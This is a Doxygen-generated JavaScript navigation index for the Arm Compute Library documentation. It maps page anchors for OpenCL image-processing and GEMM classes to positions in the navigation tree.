var NAVTREEINDEX8 = { "classarm__compute_1_1_c_l_convolution_rectangle.xhtml":[4,0,0,55], "classarm__compute_1_1_c_l_convolution_rectangle.xhtml#aa0b5cdc99cad00d35521aa756365cef2":[4,0,0,55,0], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml":[4,0,0,56], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a2146854d485039a04e73bb6254ae788b":[4,0,0,56,0], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a4075f3040a87951071878e672bab27dd":[4,0,0,56,1], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a40c8a145562e3a8a4aa332a5ee17d4c9":[4,0,0,56,2], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,56,3], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,56,7], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#abcf9df2e9d1da8abf27ca1678951673f":[4,0,0,56,4], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#ac746b3604d6b86789f4c817e095f9147":[4,0,0,56,6], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#afce1f7a8135ce82d5e12342bb05f8448":[4,0,0,56,5], "classarm__compute_1_1_c_l_convolution_square.xhtml":[4,0,0,57], "classarm__compute_1_1_c_l_convolution_square.xhtml#a185b873a3353e6b3595cfabf3f34a15a":[4,0,0,57,0], "classarm__compute_1_1_c_l_convolution_square.xhtml#a26e1b4686b1f2d591d62d11585114a82":[4,0,0,57,1], "classarm__compute_1_1_c_l_convolution_square.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,57,2], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml":[4,0,0,58], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a09ceae93051ead63b10d88903c5a62be":[4,0,0,58,6], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a1d8f06853b678915058ff9e8259948b3":[4,0,0,58,4], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,58,7], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a4b3ff5e7b109a563e4c98e45eb66ad7a":[4,0,0,58,2], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a7fa1d109f0c6d72521e336fd3955cee9":[4,0,0,58,3], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a8c3e5f7865d66adaa39c33a83211f261":[4,0,0,58,5], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#ad415131ea86e6ea86d5ebb8323e24d98":[4,0,0,58,0], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#ae6053af1378d0f87cdf91960151f6dfe":[4,0,0,58,1], "classarm__compute_1_1_c_l_depth_concatenate.xhtml":[4,0,0,59], "classarm__compute_1_1_c_l_depth_concatenate.xhtml#a3d0f9f20c596a526f57599567b5a1b7c":[4,0,0,59,0], "classarm__compute_1_1_c_l_depth_concatenate.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,59,2], "classarm__compute_1_1_c_l_depth_concatenate.xhtml#ae1e594a6c6605fb33245f84722039eab":[4,0,0,59,1], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml":[4,0,0,60], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a07c55a4048def5df8488d02a45d65dff":[4,0,0,60,2], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a32955eb357feab66e9944fd48e951b41":[4,0,0,60,6], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,60,4], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,60,8], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a4ee8d5598cedd9b60bee7bcbd95108a1":[4,0,0,60,1], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a549e2c4623a2518e98e6d35f93c051b2":[4,0,0,60,0], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a88ec361931b563961b73a6295030a60f":[4,0,0,60,3], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a96671071c32559313f5827c5487f9f72":[4,0,0,60,5], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#ad28d0a0745609ae52f6c2eff337bc38e":[4,0,0,60,7], "classarm__compute_1_1_c_l_depth_convert.xhtml":[4,0,0,61], "classarm__compute_1_1_c_l_depth_convert.xhtml#a536f0de1a70ea80d40b0a24657ac5290":[4,0,0,61,0], "classarm__compute_1_1_c_l_depth_convert_kernel.xhtml":[4,0,0,62], "classarm__compute_1_1_c_l_depth_convert_kernel.xhtml#a536f0de1a70ea80d40b0a24657ac5290":[4,0,0,62,0], "classarm__compute_1_1_c_l_derivative.xhtml":[4,0,0,63], "classarm__compute_1_1_c_l_derivative.xhtml#a62d1b655e7211f3ab44ed1a9c81a1336":[4,0,0,63,0], "classarm__compute_1_1_c_l_derivative_kernel.xhtml":[4,0,0,64], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a3ef5b9e1c310e83a57980bb4f897283a":[4,0,0,64,6], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,64,4], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,64,8], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a70712b2131aad30e1abd393799c6fa25":[4,0,0,64,0], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a772202e263f323ab3f5c6e1066e0e4f9":[4,0,0,64,1], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a83d38310c15f7b92264b5403ddd0bbda":[4,0,0,64,3], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#ab24f49526202babfe7df925cd326427b":[4,0,0,64,5], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#ac3a2c95536dfbe4ea71e3c1441cd2960":[4,0,0,64,2], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#aceb0191986422c3fcc97f2e9ed9fe15c":[4,0,0,64,7], "classarm__compute_1_1_c_l_dilate.xhtml":[4,0,0,65], "classarm__compute_1_1_c_l_dilate.xhtml#ad6a993d736f6f84aa672d3f550135c6e":[4,0,0,65,0], "classarm__compute_1_1_c_l_dilate_kernel.xhtml":[4,0,0,66], "classarm__compute_1_1_c_l_dilate_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,66,0], "classarm__compute_1_1_c_l_dilate_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,66,1], "classarm__compute_1_1_c_l_distribution1_d.xhtml":[4,0,0,67], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a14c53d2d17be6fa8a2c9861527c7b002":[4,0,0,67,3], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a1b056f14381ab6eda09ed227a3d9e9e5":[4,0,0,67,0], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a1ffeb3b5abb3d61f62b58a391816201c":[4,0,0,67,5], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a55dcc12377d15f244c59975f7cd1f623":[4,0,0,67,2], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a5d11cfbbf69ebbd595d8aee3ecbafedb":[4,0,0,67,4], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a9674808e8d2cc69872c97663ca4d6cab":[4,0,0,67,1], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml":[4,0,0,68], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a209e05c2e2bf4d5fb2b9e3f75c7d79aa":[4,0,0,68,3], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,68,2], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,68,5], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a594c3386342734f366460fccc6171c98":[4,0,0,68,0], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a9582b4541bbf86edf4f564ddd430af4b":[4,0,0,68,1], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#aaa7e7959c4a5ab3705e79d81a7e94f1d":[4,0,0,68,4], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml":[4,0,0,69], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#a148f844f5f772a8f9748b497e2b01615":[4,0,0,69,0], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#a420e0af90c5d9c001b895f479e311a56":[4,0,0,69,1], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,69,4], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#ae4e8839e52f8f14feef09d819170b40d":[4,0,0,69,3], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#af4b40677259a11edd3e83e82c1c6dd9d":[4,0,0,69,2], "classarm__compute_1_1_c_l_equalize_histogram.xhtml":[4,0,0,70], "classarm__compute_1_1_c_l_equalize_histogram.xhtml#a1edc340b1cd348c89f088a0698a8b129":[4,0,0,70,0], "classarm__compute_1_1_c_l_equalize_histogram.xhtml#a78c50e58e4c8be6de11ac6e78ca02eff":[4,0,0,70,1], "classarm__compute_1_1_c_l_equalize_histogram.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,70,2], "classarm__compute_1_1_c_l_erode.xhtml":[4,0,0,71], "classarm__compute_1_1_c_l_erode.xhtml#ad6a993d736f6f84aa672d3f550135c6e":[4,0,0,71,0], "classarm__compute_1_1_c_l_erode_kernel.xhtml":[4,0,0,72], "classarm__compute_1_1_c_l_erode_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,72,0], "classarm__compute_1_1_c_l_erode_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,72,1], "classarm__compute_1_1_c_l_fast_corners.xhtml":[4,0,0,73], "classarm__compute_1_1_c_l_fast_corners.xhtml#a25c563ab5edb7241d8f12406ed96b40c":[4,0,0,73,2], "classarm__compute_1_1_c_l_fast_corners.xhtml#a5376467035ae425342d9feb333452d07":[4,0,0,73,3], "classarm__compute_1_1_c_l_fast_corners.xhtml#a6084c2106cb3a239e026e70151bb0b33":[4,0,0,73,0], "classarm__compute_1_1_c_l_fast_corners.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,73,4], "classarm__compute_1_1_c_l_fast_corners.xhtml#ad6e12ec23a51a2963b4716cb7a59a40e":[4,0,0,73,1], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml":[4,0,0,74], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a20b6847087f9a922754b94067ddcb537":[4,0,0,74,1], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a2b06599adac42d0aa917573716356999":[4,0,0,74,3], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,74,4], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,74,8], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a70fd54f07efa6bc5b75e71ad68468b95":[4,0,0,74,0], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a84deccfff9f686445194594e058284bf":[4,0,0,74,5], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#ac18eae467f4bbad88cbf69c5b835926b":[4,0,0,74,2], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#ac5e031f7c81be9bbac3372bb6edbd344":[4,0,0,74,6], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#ac64dcd555f8756462b629bf58a28bfc3":[4,0,0,74,7], "classarm__compute_1_1_c_l_fill_border.xhtml":[4,0,0,75], "classarm__compute_1_1_c_l_fill_border.xhtml#acd47b636ec90ab214e6f194989ea7af5":[4,0,0,75,0], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml":[4,0,0,76], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a20ff8e5282e5f632ccd62f199e714f10":[4,0,0,76,1], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a381be9310933ff673959d1d7b6842b8e":[4,0,0,76,0], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a4370ae5fda7bd455a171fc8ed4d3f283":[4,0,0,76,5], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,76,8], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a5054b330eb55a5ffade0405f2021abf4":[4,0,0,76,2], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a569042df5e874046fe622b6723289a86":[4,0,0,76,6], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a8c127ae32e8e5fa6bab31910663bcde1":[4,0,0,76,7], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#ac56c459beac7a6b904b6dece97b377e6":[4,0,0,76,9], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#ad22d0bc4356a4068c244952df68fd5c7":[4,0,0,76,3], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#ae1b9fe62ed42f469f1de879c33d75c06":[4,0,0,76,4], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml":[4,0,0,77], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml#a1ac038a6808c0f16eede67dc0372b8d3":[4,0,0,77,0], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml#a55e5ebb7cdabf8bf197698453543dfb5":[4,0,0,77,1], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,77,2], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml":[4,0,0,78], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml#a429b00993ed6d0fb5b9880984f981ab6":[4,0,0,78,1], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml#a60ae050703616fb6e60513b5ddc69731":[4,0,0,78,0], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,78,2], "classarm__compute_1_1_c_l_g_e_m_m.xhtml":[4,0,0,89], "classarm__compute_1_1_c_l_g_e_m_m.xhtml#a48b9e5c0bdc8a7c306252dafff14741f":[4,0,0,89,1], "classarm__compute_1_1_c_l_g_e_m_m.xhtml#ab6b30155674bbcb9040b579cff3e5d32":[4,0,0,89,0], "classarm__compute_1_1_c_l_g_e_m_m.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,89,2], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4.xhtml":[4,0,0,90], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4.xhtml#a074e10cfb217e657b9e81adeca2abc68":[4,0,0,90,0], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml":[4,0,0,91], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a074e10cfb217e657b9e81adeca2abc68":[4,0,0,91,3], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a156b6ea0879f0350c72168e647aa58a5":[4,0,0,91,5], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a4023b128129764d7d24882a5642fe49f":[4,0,0,91,0], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,91,6], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a56008f3777b30dc6b002815c904a9c34":[4,0,0,91,4], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a56f2f1474dd673f0f8d9df3ce377f33d":[4,0,0,91,2], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a9f747ba6cad1650cd0184041de875411":[4,0,0,91,1], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml":[4,0,0,92], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml#a2300a95117613686ccf15b45f0f2ac79":[4,0,0,92,1], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml#aac051c3731008575fe02d576e0bbca11":[4,0,0,92,0], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,92,2], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml":[4,0,0,93], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,93,6], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a5f55c40f31bba46fa72429c820ff8139":[4,0,0,93,1], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a759d01d5376a17c7b81131212588810a":[4,0,0,93,0], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a8aa4449c8d99240410f4e9dff644614b":[4,0,0,93,3], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#af520778a23d6716080043321d07e9999":[4,0,0,93,4], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#af7290399a051e470ba52daadd8d7f968":[4,0,0,93,5], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#afdcbb16be23445f565801d54201c9b1d":[4,0,0,93,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml":[4,0,0,94], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a426791a071d27ffff5062e51fffac075":[4,0,0,94,0], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,94,6], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a4d630279a30875fdd3814fd93d0386e3":[4,0,0,94,1], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a4d63931364ae453852888a37f13eac8b":[4,0,0,94,4], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a5bca3bc1430f853bb9254141596f4f22":[4,0,0,94,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#acd42d73bdf14e61d6414450f134e9651":[4,0,0,94,3], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#ada53e19e832615ed9f424882d6d10df8":[4,0,0,94,5], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml":[4,0,0,95], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a00ca198bac061a1fdfbb4246e7048e63":[4,0,0,95,3], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a03d036e8e66cf1c8128c921bbca897a7":[4,0,0,95,0], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,95,6], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a6a78d63356d86ecf8e1ecd5b293087b8":[4,0,0,95,4], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a85e8d5b8770128980c3fe00b25f6c8a2":[4,0,0,95,5], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a91309d4cb7c55ed2695535421fa4346d":[4,0,0,95,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a9e75cac7f23a70ebbb9369eaf45ac0e5":[4,0,0,95,1], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml":[4,0,0,96], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#a4805eb2e5f4597f660f41753e9748eb8":[4,0,0,96,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,96,6], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#aa158230a3f3ea998530f91a14bb8e5a2":[4,0,0,96,5], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#ab7ab139607e3a7812f2a7eb941ac7aa8":[4,0,0,96,1], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#ac46a1c8a20b46838c9e894f703ddd3ee":[4,0,0,96,0], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#adc79c03f5f41ab721edc1469e714c128":[4,0,0,96,3], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#aea377825b4153d8ea48905038cbb0ff1":[4,0,0,96,4], "classarm__compute_1_1_c_l_g_e_m_m_transpose1x_w_kernel.xhtml":[4,0,0,97], "classarm__compute_1_1_c_l_g_e_m_m_transpose1x_w_kernel.xhtml#a074e10cfb217e657b9e81adeca2abc68":[4,0,0,97,0], "classarm__compute_1_1_c_l_g_e_m_m_transpose1x_w_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,97,1], "classarm__compute_1_1_c_l_gaussian3x3.xhtml":[4,0,0,79], "classarm__compute_1_1_c_l_gaussian3x3.xhtml#a2a829a721f585b9028e9712e71698e69":[4,0,0,79,0], "classarm__compute_1_1_c_l_gaussian3x3_kernel.xhtml":[4,0,0,80], "classarm__compute_1_1_c_l_gaussian3x3_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,80,0], "classarm__compute_1_1_c_l_gaussian3x3_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,80,1], "classarm__compute_1_1_c_l_gaussian5x5.xhtml":[4,0,0,81], "classarm__compute_1_1_c_l_gaussian5x5.xhtml#a0511911e03b0483fbb38d2610185fab1":[4,0,0,81,0], "classarm__compute_1_1_c_l_gaussian5x5.xhtml#a2a829a721f585b9028e9712e71698e69":[4,0,0,81,1], "classarm__compute_1_1_c_l_gaussian5x5.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,81,2], "classarm__compute_1_1_c_l_gaussian5x5_hor_kernel.xhtml":[4,0,0,82], "classarm__compute_1_1_c_l_gaussian5x5_hor_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,82,0], "classarm__compute_1_1_c_l_gaussian5x5_vert_kernel.xhtml":[4,0,0,83], "classarm__compute_1_1_c_l_gaussian5x5_vert_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,83,0], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml":[4,0,0,84], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#a0254b4991bee72d364bd7c28cc674db5":[4,0,0,84,0], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#a8c57d617c3dd6f7c04c77231dc5928f0":[4,0,0,84,2], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#aa3f47917f1cb44a55c93363eaaf39c6e":[4,0,0,84,6], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#ab55e57361d83b1cc2514d4b64f2ccec6":[4,0,0,84,1], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#ae518f24b88a33e296030407e1a42d5fb":[4,0,0,84,4], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#afafbe10da580ab0f3105947cb4a383ac":[4,0,0,84,3], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#afc0bb21e48fb78591b51913eba818410":[4,0,0,84,5], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml":[4,0,0,85], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml#a9f1c2312374125fd95ee145a4f07515c":[4,0,0,85,1], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml#ac2d6975f7677ae5079004191a6a80968":[4,0,0,85,0], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,85,2], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml":[4,0,0,86], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a120800657ef56ced788f63cef30c95be":[4,0,0,86,1], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,86,4], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,86,8], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a4da9c0690f6d7852664d5d5efcaa1b84":[4,0,0,86,0], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,86,5], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#aab322f707d331394f70405702b43378a":[4,0,0,86,6], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#abfd56453f7a32b56582b212f450aa130":[4,0,0,86,2], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#ae05299dbd8e52799fc34298966f0375d":[4,0,0,86,7], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#aff3525c5fcfeb85912814c1bbbaf0835":[4,0,0,86,3], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml":[4,0,0,87], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml#a3039d9b3acf6992402f841a9290338f9":[4,0,0,87,0], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml#a9f1c2312374125fd95ee145a4f07515c":[4,0,0,87,1], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,87,2], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml":[4,0,0,88], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,88,4], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,88,8], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a4c9a12d347a1d0be990807df7852c905":[4,0,0,88,1], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a587092ed39eaf708edbaa65e2e656ac3":[4,0,0,88,7], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a59e56fc7cd5594447db8690011060720":[4,0,0,88,2], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,88,5], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a8e68b8e249e06c5dbecd4f130fa3da54":[4,0,0,88,0], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#abc1512876a55b624d62f83b64efde7dd":[4,0,0,88,3], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#abd272921b9c15f9200c94898879f156a":[4,0,0,88,6], "classarm__compute_1_1_c_l_gradient_kernel.xhtml":[4,0,0,98], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,98,4], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a86852428dd2f3c69bd0639568c2685f8":[4,0,0,98,3], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a9a6d86fb428ad47df0aa5d8b18cb1d21":[4,0,0,98,1], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a9fc0a3b7d23e9f71e5f2ea13d51e3c11":[4,0,0,98,0], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#ad67340e556964fbc6aee83f7b2ff8101":[4,0,0,98,2], "classarm__compute_1_1_c_l_h_o_g.xhtml":[4,0,0,104], "classarm__compute_1_1_c_l_h_o_g.xhtml#a055b5bd45e91f842b49def638c017b5b":[4,0,0,104,4], "classarm__compute_1_1_c_l_h_o_g.xhtml#a1468b0adb6ec3f9d38aa7d60b8a91974":[4,0,0,104,2], "classarm__compute_1_1_c_l_h_o_g.xhtml#a14c53d2d17be6fa8a2c9861527c7b002":[4,0,0,104,5], "classarm__compute_1_1_c_l_h_o_g.xhtml#a1ffeb3b5abb3d61f62b58a391816201c":[4,0,0,104,6], "classarm__compute_1_1_c_l_h_o_g.xhtml#a4de824d64d1e21c5cee52e8d05cd0e58":[4,0,0,104,0], "classarm__compute_1_1_c_l_h_o_g.xhtml#aaa7fa8bba335c51f601110ed2e11eef3":[4,0,0,104,3], 